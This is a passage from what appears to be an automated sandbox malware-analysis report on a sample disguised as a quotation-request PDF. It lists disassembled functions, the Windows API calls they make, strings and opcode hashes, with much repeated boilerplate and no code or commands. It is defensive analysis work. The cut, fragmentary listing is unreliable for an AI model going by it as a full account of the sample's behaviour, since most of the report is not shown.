                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                                    • String ID: AutoIt3GUI$Container
                                                                    • API String ID: 2652923123-3941886329
                                                                    • Opcode ID: 461d754c246835dda3bd395489c4ac70cf72804ddeeba94fe44079accc031b16
                                                                    • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                                    • Opcode Fuzzy Hash: 461d754c246835dda3bd395489c4ac70cf72804ddeeba94fe44079accc031b16
                                                                    • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                                    Function 0044F3F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove_strncmp
                                                                    • String ID: U$\
                                                                    • API String ID: 2666721431-100911408
                                                                    • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                    • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                                    • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                    • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                                    Function 00467215 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                    • __wcsnicmp.LIBCMT ref: 00467288
                                                                    • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                    • String ID: LPT
                                                                    • API String ID: 3035604524-1350329615
                                                                    • Opcode ID: 78409a4fa05b1c2a75f678cb610307e3b76213f7ca39e6632357cd416624c234
                                                                    • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                                    • Opcode Fuzzy Hash: 78409a4fa05b1c2a75f678cb610307e3b76213f7ca39e6632357cd416624c234
                                                                    • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                                    Function 0044F082 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID: \$h
                                                                    • API String ID: 4104443479-677774858
                                                                    • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                    • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                                    • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                    • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                                    Function 0043999F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memcmp
                                                                    • String ID: &
                                                                    • API String ID: 2931989736-1010288
                                                                    • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                    • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                                    • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                    • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                                    Function 0044D3D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID: \
                                                                    • API String ID: 4104443479-2967466578
                                                                    • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                    • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                                    • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                    • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                                    Function 004667E1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 00466825
                                                                    • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CrackInternet_wcslen
                                                                    • String ID: |
                                                                    • API String ID: 596671847-2343686810
                                                                    • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                    • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                                    • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                    • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                                    Function 0044835A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: '
                                                                    • API String ID: 3850602802-1997036262
                                                                    • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                    • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                                    • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                    • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                                    Function 0040F850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _strlen.LIBCMT ref: 0040F858
                                                                      • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                                      • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                                    • _sprintf.LIBCMT ref: 0040F9AE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove$_sprintf_strlen
                                                                    • String ID: %02X
                                                                    • API String ID: 1921645428-436463671
                                                                    • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                    • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                                    • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                    • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                                    Function 00451006 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: Combobox
                                                                    • API String ID: 3850602802-2096851135
                                                                    • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                    • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                                    • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                    • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                                    Function 00451321 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: LengthMessageSendTextWindow
                                                                    • String ID: edit
                                                                    • API String ID: 2978978980-2167791130
                                                                    • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                    • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                                    • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                    • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                                    Function 00476CA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: GlobalMemorySleepStatus
                                                                    • String ID: @
                                                                    • API String ID: 2783356886-2766056989
                                                                    • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                    • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                                    • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                    • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                                    Function 00465225 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: htonsinet_addr
                                                                    • String ID: 255.255.255.255
                                                                    • API String ID: 3832099526-2422070025
                                                                    • Opcode ID: 336bf04b74032a76dffc0b3dec239f3a33009b0f842574d7a0c0b2a9c387c113
                                                                    • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                                    • Opcode Fuzzy Hash: 336bf04b74032a76dffc0b3dec239f3a33009b0f842574d7a0c0b2a9c387c113
                                                                    • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                                    Function 0044256C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: InternetOpen
                                                                    • String ID: <local>
                                                                    • API String ID: 2038078732-4266983199
                                                                    • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                    • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                                    • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                    • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                                    Function 00442BB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID: u,D
                                                                    • API String ID: 4104443479-3858472334
                                                                    • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                    • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                                    • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                    • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                                    Function 00401B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 00401B11
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • _memmove.LIBCMT ref: 00401B57
                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
